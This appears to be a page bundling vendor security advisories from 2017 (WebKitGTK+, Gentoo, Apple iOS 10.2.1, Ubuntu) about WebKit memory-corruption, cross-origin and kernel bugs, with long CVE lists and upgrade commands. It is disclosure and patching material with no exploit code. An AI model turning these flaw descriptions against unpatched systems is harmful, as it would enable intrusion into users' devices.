Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A prototype access issue was
addressed through improved exception handling.
Credit to Neymar of Tencent's Xuanwu Lab (tencent.com) working with
Trend Micro's Zero Day Initiative.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: A memory initialization issue
was addressed through improved memory handling.
Credit to Team Pangu and lokihardt at PwnFest 2016.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: Multiple validation issues existed
in the handling of page loading. This issue was addressed through
improved logic.
Credit to lokihardt of Google Project Zero.
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin. Description: A validation issue existed in
variable handling. This issue was addressed through improved
validation.
Credit to Kai Kang of Tencent's Xuanwu Lab (tencent.com).
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved input validation.
Credit to lokihardt of Google Project Zero.
Impact: A malicious website can open popups. Description: An issue
existed in the handling of blocking popups. This was addressed
through improved input validation.
Credit to Ivan Fratric of Google Project Zero.
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution. Description: Multiple memory corruption
issues were addressed through improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
February 10, 2017
.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attack can use multiple vectors to execute arbitrary code or
cause a denial of service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
[ 60 ] CVE-2017-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2442
[ 61 ] CVE-2017-2445
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2445
[ 62 ] CVE-2017-2446
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2446
[ 63 ] CVE-2017-2447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2447
[ 64 ] CVE-2017-2454
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2454
[ 65 ] CVE-2017-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2455
[ 66 ] CVE-2017-2457
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2457
[ 67 ] CVE-2017-2459
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2459
[ 68 ] CVE-2017-2460
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2460
[ 69 ] CVE-2017-2464
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2464
[ 70 ] CVE-2017-2465
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2465
[ 71 ] CVE-2017-2466
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2466
[ 72 ] CVE-2017-2468
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2468
[ 73 ] CVE-2017-2469
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2469
[ 74 ] CVE-2017-2470
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2470
[ 75 ] CVE-2017-2471
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2471
[ 76 ] CVE-2017-2475
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2475
[ 77 ] CVE-2017-2476
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2476
[ 78 ] CVE-2017-2481
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2481
[ 79 ] CVE-2017-2496
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2496
[ 80 ] CVE-2017-2504
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2504
[ 81 ] CVE-2017-2505
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2505
[ 82 ] CVE-2017-2506
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2506
[ 83 ] CVE-2017-2508
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2508
[ 84 ] CVE-2017-2510
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2510
[ 85 ] CVE-2017-2514
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2514
[ 86 ] CVE-2017-2515
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2515
[ 87 ] CVE-2017-2521
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2521
[ 88 ] CVE-2017-2525
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2525
[ 89 ] CVE-2017-2526
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2526
[ 90 ] CVE-2017-2528
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2528
[ 91 ] CVE-2017-2530
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2530
[ 92 ] CVE-2017-2531
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2531
[ 93 ] CVE-2017-2536
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2536
[ 94 ] CVE-2017-2539
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2539
[ 95 ] CVE-2017-2544
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2544
[ 96 ] CVE-2017-2547
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2547
[ 97 ] CVE-2017-2549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2549
[ 98 ] CVE-2017-6980
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6980
[ 99 ] CVE-2017-6984
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-6984
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201706-15
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
--NcNxMnppmhackEL27c23XhPLDAAQ7GQcq--
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-01-23-1 iOS 10.2.1
iOS 10.2.1 is now available and addresses the following:
Auto Unlock
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Auto Unlock may unlock when Apple Watch is off the user's
wrist
Description: A logic issue was addressed through improved state
management.
CVE-2017-2352: Ashley Fernandez of raptAware Pty Ltd
Contacts
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing a maliciously crafted contact card may lead to
unexpected application termination
Description: An input validation issue existed in the parsing of
contact cards.
CVE-2017-2368: Vincent Desmurs (vincedes3)
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2017-2370: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed through improved
memory management.
CVE-2017-2360: Ian Beer of Google Project Zero
libarchive
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Unpacking a maliciously crafted archive may lead to arbitrary
code execution
Description: A buffer overflow issue was addressed through improved
memory handling.
CVE-2016-8687: Agostino Sarubbo of Gentoo
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A prototype access issue was addressed through improved
exception handling.
CVE-2017-2354: Neymar of Tencent's Xuanwu Lab (tencent.com) working
with Trend Micro's Zero Day Initiative
CVE-2017-2362: Ivan Fratric of Google Project Zero
CVE-2017-2373: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory initialization issue was addressed through
improved memory handling.
CVE-2017-2356: Team Pangu and lokihardt at PwnFest 2016
CVE-2017-2366: Kai Kang of Tencent's Xuanwu Lab (tencent.com)
CVE-2017-2369: Ivan Fratric of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: Multiple validation issues existed in the handling of
page loading.
CVE-2017-2363: lokihardt of Google Project Zero
CVE-2017-2364: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: A malicious website can open popups
Description: An issue existed in the handling of blocking popups.
CVE-2017-2371: lokihardt of Google Project Zero
WebKit
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: Processing maliciously crafted web content may exfiltrate
data cross-origin
Description: A validation issue existed in variable handling.
CVE-2017-2365: lokihardt of Google Project Zero
WiFi
Available for: iPhone 5 and later, iPad 4th generation and later,
iPod touch 6th generation and later
Impact: An activation-locked device can be manipulated to briefly
present the home screen
Description: An issue existed with handling user input that caused a
device to present the home screen even when activation locked.
CVE-2017-2351: Sriram (@Sri_Hxor) of Primefort Pvt. Ltd., Hemanth
Joseph
Additional recognition
WebKit hardening
We would like to acknowledge Ben Gras, Kaveh Razavi, Erik Bosman,
Herbert Bos, and Cristiano Giuffrida of the vusec group at
Vrije Universiteit Amsterdam for their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org
iQIcBAEBCgAGBQJYgqLhAAoJEIOj74w0bLRGLBMP/2hLYLM6/FsH/npzPbCouZ3a
7WrIax5GAURyvKmeSHYwbZCyDa+U8RoR83xnm25QxVA0SYiqxYQTLavKkdiwL5dL
QJHtbltb3BWF0ctkcN4q9dvA13kapdn7zr1Zp3MyvnqlsIuo5acsl8DwgNapxklP
6NNgLFuUUPDITMRX+CZlndS3ldas9nWBHGUw7FfVQd7+SCj8+u6CBpVm03SPjC4E
9rObbrDg6Ur7RW8sYz5TvfQ+JfL8ZJQgjCNLE99AV5n+y1SzUaW5+WgklmJzwabm
P6VFCFI3qMctmiHDFh5Ab9eFCspL1ppl8gCj2+eqxCdi9cVPdiOxGUJXkfzUvLCq
d68lHHSasRjoVMacMz9ttpR7IAQpM4L9KYgJ/AbwvOFKn5MkxAJYpbU2DDnlg4UY
ZyZ8CqmIfZoEgDFSx4+LcfNeMoB0f0eDClXzCZkLMqyc7ZhRWcDPO7UTXl2l5IN9
1BoOZJ4AB6unI9/JmTz9x1mkfOMatsz3Mlw2aoqfYqhBYH4IMruIoIx9L7VawxY9
IZM1fJhEc1PejgZ48X95suaGm3LHzSqXo9gIcJ42SEevqFaoD96I5S+D1eeBOIe7
yvyQ8APU6W3io9vlfQG7oW+mtHg0uPJY6yLj+79NpvAeVHrFHi1Am+A/4uuEZLjZ
toC5axX5Dn1ZXgiVJb2H
=6bnQ
-----END PGP SIGNATURE-----
.
===========================================================================
Ubuntu Security Notice USN-3200-1
February 16, 2017
webkit2gtk vulnerabilities
===========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.10
- Ubuntu 16.04 LTS
Summary:
Several security issues were fixed in WebKitGTK+.
Software Description:
- webkit2gtk: Web content engine library for GTK+
Details:
A large number of security issues were discovered in the WebKitGTK+ Web and
JavaScript engines. If a user were tricked into viewing a malicious
website, a remote attacker could exploit a variety of issues related to web
browser security, including cross-site scripting attacks, denial of service
attacks, and arbitrary code execution.
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 16.10:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.10.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.10.1
Ubuntu 16.04 LTS:
libjavascriptcoregtk-4.0-18 2.14.5-0ubuntu0.16.04.1
libwebkit2gtk-4.0-37 2.14.5-0ubuntu0.16.04.1
This update uses a new upstream release, which includes additional bug
fixes. After a standard system update you need to restart any applications
that use WebKitGTK+, such as Epiphany, to make all the necessary changes.
References:
http://www.ubuntu.com/usn/usn-3200-1
CVE-2017-2350, CVE-2017-2354, CVE-2017-2355, CVE-2017-2356,
CVE-2017-2362, CVE-2017-2363, CVE-2017-2364, CVE-2017-2365,
CVE-2017-2366, CVE-2017-2369, CVE-2017-2371, CVE-2017-2373
Package Information:
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.10.1
https://launchpad.net/ubuntu/+source/webkit2gtk/2.14.5-0ubuntu0.16.04.1
| VAR-201702-0868 | CVE-2017-2354 | Apple Safari SearchInputType Type Confusion Remote Code Execution Vulnerability |
CVSS V2: 6.8 CVSS V3: 8.8 Severity: HIGH |
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. iCloud before 6.1.1 is affected. iTunes before 12.5.5 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within SearchInputType objects. The issue results from the lack of proper validation of user-supplied data which can result in a type confusion condition. An attacker can leverage this vulnerability to achieve remote code execution under the context of the process. WebKit is prone to multiple memory-corruption vulnerabilities. Failed exploit attempts may result in a denial-of-service condition. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome.
Safari 10.0.3 may be obtained from the Mac App Store.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: June 07, 2017
Bugs: #543650, #573656, #577068, #608958, #614876, #619788
ID: 201706-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in WebKitGTK+, the worst of
which allows remote attackers to execute arbitrary code.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.16.3 >= 2.16.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.3:4"
References
==========
[ 1 ] CVE-2015-2330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2330
[ 2 ] CVE-2015-7096
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7096
[ 3 ] CVE-2015-7098
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7098
[ 4 ] CVE-2016-1723
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1723
[ 5 ] CVE-2016-1724
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1724
[ 6 ] CVE-2016-1725
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1725
[ 7 ] CVE-2016-1726
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1726
[ 8 ] CVE-2016-1727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1727
[ 9 ] CVE-2016-1728
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1728
[ 10 ] CVE-2016-4692
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4692
[ 11 ] CVE-2016-4743
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4743
[ 12 ] CVE-2016-7586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7586
[ 13 ] CVE-2016-7587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7587
[ 14 ] CVE-2016-7589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7589
[ 15 ] CVE-2016-7592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7592
[ 16 ] CVE-2016-7598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7598
[ 17 ] CVE-2016-7599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7599
[ 18 ] CVE-2016-7610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7610
[ 19 ] CVE-2016-7611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7611
[ 20 ] CVE-2016-7623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7623
[ 21 ] CVE-2016-7632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7632
[ 22 ] CVE-2016-7635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7635
[ 23 ] CVE-2016-7639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7639
[ 24 ] CVE-2016-7640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7640
[ 25 ] CVE-2016-7641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7641
[ 26 ] CVE-2016-7642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7642
[ 27 ] CVE-2016-7645
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7645
[ 28 ] CVE-2016-7646
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7646
[ 29 ] CVE-2016-7648
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7648
[ 30 ] CVE-2016-7649
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7649
[ 31 ] CVE-2016-7652
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7652
[ 32 ] CVE-2016-7654
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7654
[ 33 ] CVE-2016-7656
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-7656
[ 34 ] CVE-2016-9642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9642
[ 35 ] CVE-2016-9643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-9643
[ 36 ] CVE-2017-2350
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2350
[ 37 ] CVE-2017-2354
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2354
[ 38 ] CVE-2017-2355
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2355
[ 39 ] CVE-2017-2356
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2356
[ 40 ] CVE-2017-2362
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2362
[ 41 ] CVE-2017-2363
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2363
[ 42 ] CVE-2017-2364
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2364
[ 43 ] CVE-2017-2365
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2365
[ 44 ] CVE-2017-2366
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2366
[ 45 ] CVE-2017-2367
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2367
[ 46 ] CVE-2017-2369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2369
[ 47 ] CVE-2017-2371
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2371
[ 48 ] CVE-2017-2373
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2373
[ 49 ] CVE-2017-2376
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2376
[ 50 ] CVE-2017-2377
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2377
[ 51 ] CVE-2017-2386
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2386
[ 52 ] CVE-2017-2392
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2392
[ 53 ] CVE-2017-2394
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2394
[ 54 ] CVE-2017-2395
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2395
[ 55 ] CVE-2017-2396
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2396
[ 56 ] CVE-2017-2405
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2405
[ 57 ] CVE-2017-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2415
[ 58 ] CVE-2017-2419
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2419
[ 59 ] CVE-2017-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-2433
